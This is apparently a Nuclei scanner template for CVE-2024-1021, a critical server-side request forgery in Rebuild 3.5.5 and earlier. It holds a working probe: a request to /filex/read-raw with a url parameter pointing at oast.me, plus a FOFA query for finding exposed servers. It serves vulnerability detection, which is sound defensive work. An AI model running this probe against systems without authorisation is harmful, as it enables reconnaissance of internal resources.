48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
id: CVE-2024-1021
|
|
|
|
info:
|
|
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
|
|
author: BMCel
|
|
severity: critical
|
|
description: |
|
|
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
|
|
reference:
|
|
- https://github.com/getrebuild/rebuild
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
|
|
- https://vuldb.com/?ctiid.252290
|
|
- https://vuldb.com/?id.252290
|
|
- https://github.com/tanjiti/sec_profile
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-1021
|
|
cwe-id: CWE-918
|
|
epss-score: 0.01163
|
|
epss-percentile: 0.84597
|
|
cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: ruifang-tech
|
|
product: rebuild
|
|
fofa-query: "icon_hash=\"871154672\""
|
|
tags: cve2024,cve,rebuild,ssrf,ruifang-tech
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
- "{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2, "<h1> Interactsh Server </h1>")'
|
|
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
|
|
- 'status_code_2 == 200'
|
|
condition: and
|
|
# digest: 4a0a0047304502210083066599f18b2c54a0a9076795f7d22b1ca8d8fad2c8f03a3147ec730c002e9702203386c976a8e99262651e52994ce6d95c2f342a0cc4e8518139df96275c9a03f0:922c64590222798bb761d5b6d8e72950 |